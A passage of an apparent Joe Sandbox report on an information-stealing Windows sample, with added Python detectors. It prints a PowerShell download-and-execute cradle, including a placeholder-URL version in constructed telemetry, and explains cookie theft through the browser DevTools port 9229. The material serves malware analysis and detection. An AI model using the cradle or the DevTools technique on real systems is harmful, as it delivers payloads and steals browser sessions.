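• GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 008E482D
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 008E483E
• GetProcAddress.KERNEL32(00000000,htons), ref: 008E484F
• GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 008E4860
• GetProcAddress.KERNEL32(00000000,recv), ref: 008E4871
• GetProcAddress.KERNEL32(00000000,socket), ref: 008E4882
• GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 008E4893
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 008E48A4
• GetProcAddress.KERNEL32(00000000,send), ref: 008E48B5
• lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008DBEF1
• memset.MSVCRT ref: 008DDAC1
  • Part of subcall function 008C90F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008C912C
"""

# One "APIs" line: optional bullet, optional subcall prefix, API.MODULE, optional
# "(args)" and the call-site address after "ref:". The greedy args group backtracks
# to the last ")" before ", ref:", so parentheses inside string arguments survive.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_api_lines(text):
    """Parse Joe Sandbox IDA-plugin 'APIs' lines into call records.

    Arguments are split on commas, which is naive for string arguments that
    contain commas; none of the lines on this page do, and only the first two
    argument positions matter for the import reconstruction below."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args is not None else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),
        })
    return calls


def resolved_imports(calls):
    """Recover the import list hidden behind LoadLibrary*/GetProcAddress.

    The sandbox prints the HMODULE argument as 00000000 (not known statically),
    so each GetProcAddress name is attributed to the most recent LoadLibrary*
    call when the calls are ordered by call-site address (assumption: one
    linear resolver function, as in the listing above)."""
    by_module = defaultdict(list)
    current = None
    for c in sorted(calls, key=lambda c: c["ref"]):
        if c["api"].startswith("LoadLibrary") and c["args"]:
            current = c["args"][0].lower()
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            by_module[current or "<unknown module>"].append(c["args"][1])
    return dict(by_module)


def api_histogram(calls):
    """Count calls per API name, the raw material behind the report's 'API ID' line."""
    return Counter(c["api"] for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for module, names in resolved_imports(parsed).items():
        print(f"{module}: {', '.join(names)}")
    print(api_histogram(parsed).most_common(3))
```

Run over a whole report, the same parser gives a per-function call histogram and a list of every module the sample resolves at runtime; anything resolved by name but absent from the PE import directory is a candidate for a YARA string rule on the unpacked image.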
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DBEB3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DBEE6
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008DBEF1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DBF11
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008DBF1D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBF40
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DBF4B
                                    • lstrlen.KERNEL32(')"), ref: 008DBF56
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBF73
                                    • lstrcat.KERNEL32(00000000,')"), ref: 008DBF7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBFA6
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008DBFC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DBFE8
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008DBFF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DC01A
                                    • ShellExecuteEx.SHELL32(?), ref: 008DC06C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: c144f71fc15fc6b80fa4f0980a7545561bd1c9861a90ef76f37813df4152b6bd
                                    • Instruction ID: 10486239c325ad4c512dd8bbd7215861a1ef5e0ea5f2500dc0fd4276354f0299
                                    • Opcode Fuzzy Hash: c144f71fc15fc6b80fa4f0980a7545561bd1c9861a90ef76f37813df4152b6bd
                                    • Instruction Fuzzy Hash: 98616C71A01A4A9BCB11AFF98C89B6F7BB8FF44300F05462AE505D7351DF34C9068B92
                                    APIs
                                    • memset.MSVCRT ref: 008DDAC1
                                    • memset.MSVCRT ref: 008DDAD3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DDAFB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDB2E
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DDB3C
                                    • lstrcat.KERNEL32(?,0053E4C0), ref: 008DDB56
                                    • lstrcat.KERNEL32(?,?), ref: 008DDB6A
                                    • lstrcat.KERNEL32(?,0053D0D0), ref: 008DDB7E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDBAE
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DDBB5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DDC1E
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID: @S
                                    • API String ID: 2367105040-2110166956
                                    • Opcode ID: 6573fb0df5696644e3f06d682cf2694c4f5bbbb6941c73e230ef55ee3d7b75e3
                                    • Instruction ID: 9db030b68c0896aca26dea42e4ce05829d649dcd74cff68f9ee3adf1b04ec545
                                    • Opcode Fuzzy Hash: 6573fb0df5696644e3f06d682cf2694c4f5bbbb6941c73e230ef55ee3d7b75e3
                                    • Instruction Fuzzy Hash: 30B17D71910259AFCB10EFB8CC88EAE7BB9FF48304F14496AE945E7350DA349E45CB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4B43
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008D4B75
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4BC2
                                    • lstrlen.KERNEL32(008F5128), ref: 008D4BCD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4BEA
                                    • lstrcat.KERNEL32(00000000,008F5128), ref: 008D4BF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C1B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C48
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4C53
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C7A
                                    • StrStrA.SHLWAPI(?,00000000), ref: 008D4C8C
                                    • lstrlen.KERNEL32(?), ref: 008D4CA0
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4CE1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4D68
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4D91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4DBA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4DE0
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4E0D
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
                                    • Opcode ID: 2b43f5953ed127c69a7a6372fc8d199a49a8ad4fe25c7d984738bdea63fa5381
                                    • Instruction ID: b8a5a7ef88b2f7caecf9fcc7ef60d202b29f42580ab89056c72a45fa7c4aedba
                                    • Opcode Fuzzy Hash: 2b43f5953ed127c69a7a6372fc8d199a49a8ad4fe25c7d984738bdea63fa5381
                                    • Instruction Fuzzy Hash: 99B13731A116069BCB24EFB8D889EAF7BB9FF44300F045629B945E7351DE34EC168B91
                                    APIs
                                      • Part of subcall function 008C90F0: InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C910F
                                      • Part of subcall function 008C90F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008C912C
                                      • Part of subcall function 008C90F0: InternetCloseHandle.WININET(00000000), ref: 008C9139
                                    • strlen.MSVCRT ref: 008C9311
                                    • strlen.MSVCRT ref: 008C932A
                                      • Part of subcall function 008C89B0: std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                    • strlen.MSVCRT ref: 008C93C9
                                    • strlen.MSVCRT ref: 008C9416
                                    • lstrcat.KERNEL32(?,cookies), ref: 008C9577
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008C9589
                                    • lstrcat.KERNEL32(?,?), ref: 008C959A
                                    • lstrcat.KERNEL32(?,008F5160), ref: 008C95AC
                                    • lstrcat.KERNEL32(?,?), ref: 008C95BD
                                    • lstrcat.KERNEL32(?,.txt), ref: 008C95CF
                                    • lstrlen.KERNEL32(?), ref: 008C95E6
                                    • lstrlen.KERNEL32(?), ref: 008C960B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C9644
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 1201316467-3542011879
                                    • Opcode ID: 3c19cd9eb6ae8ddaa9cf549ffe6347edd5ff7d478ab0b3e93b47c55229b8720b
                                    • Instruction ID: 51819bc3994493bb0864123a97474fe210a9fca81d0d92cff9b01db401eb434e
                                    • Opcode Fuzzy Hash: 3c19cd9eb6ae8ddaa9cf549ffe6347edd5ff7d478ab0b3e93b47c55229b8720b
                                    • Instruction Fuzzy Hash: 98E1F471E10258EBDF14DFA8C884BDEBBB5FF48300F1044A9E549E7281DB74AA46CB95
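Two functions above describe host behaviour that is easier to catch from process telemetry than from the binary. The first assembles `-nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` and launches it through ShellExecuteEx using `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`, i.e. the 32-bit PowerShell host on a 64-bit system, so a rule keyed only on the System32 path misses it. The second fetches http://localhost:9229/json and builds a ws://localhost:9229/devtools URL and a "cookies" .txt filename; /json and /devtools/page/<id> are the Chromium DevTools remote-debugging discovery endpoint and per-target WebSocket, which a browser exposes when started with --remote-debugging-port. The script below is an added detection example, not part of the Joe Sandbox report and not the sample's code. All events, the download URL, the parent path and the browser command line are constructed placeholders; that this sample starts the browser with --remote-debugging-port is an assumption about how that endpoint gets enabled, not something this page shows.

```python
import json
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation event (Sysmon Event ID 1 style, reduced to the fields used)."""
    pid: int
    image: str
    command_line: str
    parent_image: str


# Constructed telemetry. The parent path, the URL and the Chrome command line are
# placeholders, not values taken from the report.
EVENTS = [
    ProcessEvent(4120, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://payload.invalid/x.ps1')"''',
                 r"C:\Users\user\AppData\Local\Temp\file.exe"),
    ProcessEvent(4130, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"',
                 r"C:\Users\user\AppData\Local\Temp\file.exe"),
    ProcessEvent(4140, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -NoProfile -Command "Get-Process | Out-String"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(4150, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
]

# Download cradle: iex/Invoke-Expression over a WebClient.DownloadString result.
# Case-insensitive and tolerant of the optional "System." prefix and of spacing,
# because PowerShell accepts abbreviated, mixed-case forms of all of these.
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.{0,80}?new-object\s+(?:system\.)?net\.webclient"
    r".{0,40}?\.downloadstring\(\s*['\"](?P<url>[^'\"]+)['\"]",
    re.IGNORECASE,
)
NOPROFILE = re.compile(r"(?<!\S)-nop(?:rofile)?\b", re.IGNORECASE)
REMOTE_DEBUG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(?P<port>\d+))?", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "chromium.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_powershell_cradle(ev):
    """Flag a PowerShell download-and-execute one-liner; report the URL and host path."""
    m = CRADLE.search(ev.command_line)
    if not m:
        return None
    return {
        "pid": ev.pid,
        "rule": "powershell_download_cradle",
        "url": m.group("url"),
        "no_profile": bool(NOPROFILE.search(ev.command_line)),
        # The sample uses the WOW64 host; keep this as a field, not a filter.
        "wow64_host": "\\syswow64\\" in ev.image.lower(),
        "parent": ev.parent_image,
    }


def detect_remote_debugging(ev):
    """Flag a Chromium-family browser started with DevTools remote debugging enabled.

    Developers use this flag legitimately; a non-browser parent (here a dropped
    executable) is what turns it into a cookie-theft indicator."""
    if _basename(ev.image) not in BROWSERS:
        return None
    m = REMOTE_DEBUG.search(ev.command_line)
    if not m:
        return None
    return {
        "pid": ev.pid,
        "rule": "browser_remote_debugging",
        "port": int(m.group("port")) if m.group("port") else None,
        "parent_is_browser": _basename(ev.parent_image) in BROWSERS,
        "parent": ev.parent_image,
    }


def scan(events):
    """Run both detectors over a batch of events; alerts come back in event order."""
    alerts = []
    for ev in events:
        for detector in (detect_powershell_cradle, detect_remote_debugging):
            hit = detector(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed body in the shape the DevTools /json endpoint returns: a list of
# targets, each with a per-target WebSocket URL under /devtools/page/<id>.
DEVTOOLS_JSON = """[ {
   "description": "",
   "id": "0F1C2B3A4D5E6F708192A3B4C5D6E7F8",
   "title": "New Tab",
   "type": "page",
   "url": "chrome://newtab/",
   "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/0F1C2B3A4D5E6F708192A3B4C5D6E7F8"
} ]"""


def devtools_targets(body):
    """Return the page-target WebSocket URLs from a /json discovery response.

    This is what the sample's InternetOpenUrlA(http://localhost:9229/json) call
    would receive; the ws://localhost:9229/devtools string it concatenates is the
    prefix of these URLs."""
    return [t["webSocketDebuggerUrl"] for t in json.loads(body)
            if t.get("type") == "page" and "webSocketDebuggerUrl" in t]


if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(alert)
    print(devtools_targets(DEVTOOLS_JSON))
```

On a real host these events come from Sysmon or an EDR sensor; the second detection pairs naturally with a network-connection rule for a non-browser process connecting to 127.0.0.1 on the port named in the browser's command line, which is the step the localhost:9229 strings above correspond to.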
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • RegOpenKeyExA.ADVAPI32(?,0053B258,00000000,00020019,?), ref: 008E375D
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008E3797
                                    • wsprintfA.USER32 ref: 008E37C2
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 008E37E0
                                    • RegCloseKey.ADVAPI32(?), ref: 008E37EE
                                    • RegCloseKey.ADVAPI32(?), ref: 008E37F8
                                    • RegQueryValueExA.ADVAPI32(?,0053E178,00000000,000F003F,?,?), ref: 008E3841
                                    • lstrlen.KERNEL32(?), ref: 008E3856
                                    • RegQueryValueExA.ADVAPI32(?,0053E190,00000000,000F003F,?,00000400), ref: 008E38C7
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3912
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3929
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?$xS
                                    • API String ID: 13140697-3754986874
                                    • Opcode ID: 275fb1d683c08947f0a9f4a2b1eaf94c91ab7cfa00c58a9bdf23bf971bd0fa33
                                    • Instruction ID: 039812707ed87e20aec83157ea5008ca9d83174d769c2dd75278e729c292efb4
                                    • Opcode Fuzzy Hash: 275fb1d683c08947f0a9f4a2b1eaf94c91ab7cfa00c58a9bdf23bf971bd0fa33
                                    • Instruction Fuzzy Hash: 839161729002489FCB10DFE5DC84AEEBBB9FB49310F158169E609EB251DB319E46CF90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CB420
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB46E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB499
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CB4A1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB4C9
                                    • lstrlen.KERNEL32(008F5218), ref: 008CB540
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB564
                                    • lstrcat.KERNEL32(00000000,008F5218), ref: 008CB570
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB599
                                    • lstrlen.KERNEL32(00000000), ref: 008CB61D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB647
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008CB64F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB677
                                    • lstrlen.KERNEL32(008F509C), ref: 008CB6EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB712
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008CB71E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB74E
                                    • lstrlen.KERNEL32(?), ref: 008CB857
                                    • lstrlen.KERNEL32(?), ref: 008CB866
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008CB88E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: ae58645bd6113efef93e40b34fc40fcfec90b28570db9bb6632e4aaedf700fe4
                                    • Instruction ID: 61f5e331e55e279d5b21b4a66fbe0a41a1c49919b991d181e31c33e7f1a6708b
                                    • Opcode Fuzzy Hash: ae58645bd6113efef93e40b34fc40fcfec90b28570db9bb6632e4aaedf700fe4
                                    • Instruction Fuzzy Hash: 35021F70A01A058FCB24DFA9D949F6ABBB5FF44315F18816DE809DB2A1DB35DC42CB81
                                    APIs
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C910F
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008C912C
                                    • InternetCloseHandle.WININET(00000000), ref: 008C9139
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 008C9196
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008C91C7
                                    • InternetCloseHandle.WININET(00000000), ref: 008C91D2
                                    • InternetCloseHandle.WININET(00000000), ref: 008C91D9
                                    • strlen.MSVCRT ref: 008C91EA
                                    • strlen.MSVCRT ref: 008C921D
                                    • strlen.MSVCRT ref: 008C925E
                                    • strlen.MSVCRT ref: 008C927C
                                      • Part of subcall function 008C89B0: std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: c4782353c64f5d929b34b32172d04b1dfbf6089a2ccf554599cf9cbc135bd587
                                    • Instruction ID: 2550b4580c7eade7bb6db71e5e8f1e938dbd2952037188ae7df58ebb0818e863
                                    • Opcode Fuzzy Hash: c4782353c64f5d929b34b32172d04b1dfbf6089a2ccf554599cf9cbc135bd587
                                    • Instruction Fuzzy Hash: D651B571640249ABDB10DBE8DC49FEEB7B9FB44710F140169F604E3380DBB8EA498761
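The function at 008C910F above fetches http://localhost:9229/json with WinINet and then scans the body for the two literals "webSocketDebuggerUrl": and "ws://. That is the discovery endpoint of the DevTools remote-debugging protocol: a Chromium browser started with --remote-debugging-port, or a Node.js process started with --inspect (whose default port is 9229), answers GET /json with a list of debuggable targets, and the webSocketDebuggerUrl in each entry is all a client on the same host needs to attach and drive that target. The endpoint binds to loopback by default, which keeps remote hosts out but not a process already running on the machine, as this sample is. The Python below is an added example and is not code from the report or from the sample: it reproduces the two-literal scan on a constructed /json body, shows the JSON-parsing form a well-behaved client would use instead, and adds a command-line check an analyst can run over a process listing to find a debug endpoint being exposed. The sample response, the process command lines and the flag list are this example's own assumptions.

```python
import json
import re
from typing import List, Optional

# Constructed response body (same shape as a real DevTools/inspector /json
# listing; the id, title and url are invented for this example).
SAMPLE_JSON_RESPONSE = """[ {
  "description": "node.js instance",
  "id": "3f8e1d2c-0000-4000-8000-000000000001",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/3f8e1d2c-0000-4000-8000-000000000001"
} ]"""

NEEDLE = '"webSocketDebuggerUrl":'   # the two literals present in the sample's strings
PREFIX = '"ws://'

def extract_ws_url_by_scan(body: str) -> Optional[str]:
    """Two-literal scan, the way the 008C910F routine appears to work: locate the
    key, then the next "ws://, and take everything up to the closing quote."""
    key = body.find(NEEDLE)
    if key < 0:
        return None
    start = body.find(PREFIX, key + len(NEEDLE))
    if start < 0:
        return None
    start += 1                              # step over the opening quote
    end = body.find('"', start)
    return body[start:end] if end > start else None

def extract_ws_urls_by_json(body: str) -> List[str]:
    """What a proper client does: parse the JSON and collect every target's debugger
    URL (a browser with several tabs returns several entries, the scan sees only one)."""
    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict) and isinstance(t.get("webSocketDebuggerUrl"), str)]

# Flags that open a DevTools/inspector endpoint. Chromium: --remote-debugging-port
# (any port, 9222 by convention) or --remote-debugging-pipe. Node.js: --inspect or
# --inspect-brk (default port 9229, the port this sample queries).
DEBUG_FLAG_RE = re.compile(
    r"(?:^|\s)--(?:remote-debugging-port(?:=\d+)?|remote-debugging-pipe"
    r"|inspect(?:-brk)?(?:=[\w.:\[\]]+)?)(?=\s|$)"
)

def exposes_debug_endpoint(cmdline: str) -> bool:
    return DEBUG_FLAG_RE.search(cmdline) is not None

def find_debug_endpoints(cmdlines: List[str]) -> List[str]:
    """Return the command lines from a process listing that expose a debug endpoint."""
    return [c for c in cmdlines if exposes_debug_endpoint(c)]

# Constructed process command lines for the check (not taken from the report).
SAMPLE_CMDLINES = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9229 --user-data-dir="C:\tmp\profile"',
    r'"C:\Program Files\nodejs\node.exe" --inspect=127.0.0.1:9229 C:\app\app.js',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
    r'"C:\Program Files\nodejs\node.exe" --max-old-space-size=4096 C:\app\app.js',
]

if __name__ == "__main__":
    print("scan :", extract_ws_url_by_scan(SAMPLE_JSON_RESPONSE))
    print("json :", extract_ws_urls_by_json(SAMPLE_JSON_RESPONSE))
    for c in find_debug_endpoints(SAMPLE_CMDLINES):
        print("debug endpoint exposed by:", c)
```

The scan-based extractor is deliberately as naive as the literal search suggests: it stops at the first target and is fooled by any body that merely contains those two strings, so a defender who wants a decoy can serve one. The command-line check is the practical detection angle: a browser or Node process carrying one of these flags, especially one spawned by something other than the user's shell, is what makes the /json request at 008C912C useful to the sample.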
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 008E1681
                                    • lstrcpy.KERNEL32(00000000,0052BA18), ref: 008E16AC
                                    • lstrlen.KERNEL32(?,?,?,?), ref: 008E16B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E16D6
                                    • lstrcat.KERNEL32(00000000,?), ref: 008E16E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E170A
                                    • lstrlen.KERNEL32(0053A3E0,?,?,?), ref: 008E171F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1742
                                    • lstrcat.KERNEL32(00000000,0053A3E0), ref: 008E174A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1772
                                    • ShellExecuteEx.SHELL32(?), ref: 008E17AD
                                    • ExitProcess.KERNEL32 ref: 008E17E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
